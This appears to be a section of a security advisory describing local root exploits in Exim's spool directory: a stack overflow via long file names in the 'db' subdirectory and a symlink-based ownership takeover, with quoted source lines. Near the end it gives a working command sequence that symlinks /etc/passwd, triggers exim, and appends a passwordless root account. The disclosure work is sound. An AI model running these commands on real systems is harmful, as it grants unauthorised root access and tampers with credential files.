========================================================================
CVE-2020-SPDIR -- Assorted attacks in Exim's spool directory
========================================================================

Exim also operates as root in its spool directory, which belongs to the
"exim" user:

An attacker who obtained the privileges of the "exim" user can exploit
this local vulnerability to obtain full root privileges. Various attack
vectors exist:

- The attacker can write to a spool header file (in the "input"
  subdirectory) and reuse our exploitation technique for CVE-2020-NLEND.

- The attacker can create a long-named file in the "db" subdirectory and
  overflow a stack-based buffer (at line 208):

 87 open_db *
 88 dbfn_open(uschar *name, int flags, open_db *dbblock, BOOL lof)
 89 {
 ..
 94 uschar dirname[256], filename[256];
...
111 snprintf(CS dirname, sizeof(dirname), "%s/db", spool_directory);
112 snprintf(CS filename, sizeof(filename), "%s/%s.lockfile", dirname, name);
...
198   uschar *lastname = Ustrrchr(filename, '/') + 1;
199   int namelen = Ustrlen(name);
200
201   *lastname = 0;
202   dd = opendir(CS filename);
203
204   while ((ent = readdir(dd)))
205     if (Ustrncmp(ent->d_name, name, namelen) == 0)
206       {
207       struct stat statbuf;
208       Ustrcpy(lastname, ent->d_name);

- The attacker can create a symlink (or a hardlink) in the "db"
  subdirectory and take ownership of an arbitrary file (at line 212):

204   while ((ent = readdir(dd)))
205     if (Ustrncmp(ent->d_name, name, namelen) == 0)
206       {
207       struct stat statbuf;
208       Ustrcpy(lastname, ent->d_name);
209       if (Ustat(filename, &statbuf) >= 0 && statbuf.st_uid != exim_uid)
210         {
211         DEBUG(D_hints_lookup) debug_printf_indent("ensuring %s is owned by exim\n", filename);
212         if (Uchown(filename, exim_uid, exim_gid))

cd /var/spool/exim4
cd db/
rm -f retry*
ln -s -f /etc/passwd retry.passwd
echo | /usr/sbin/exim4 postmaster
echo 'fullroot::0:0::/:' >> /etc/passwd

Last-minute note: CVE-2020-LFDIR and CVE-2020-SPDIR are very similar to
https://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/.

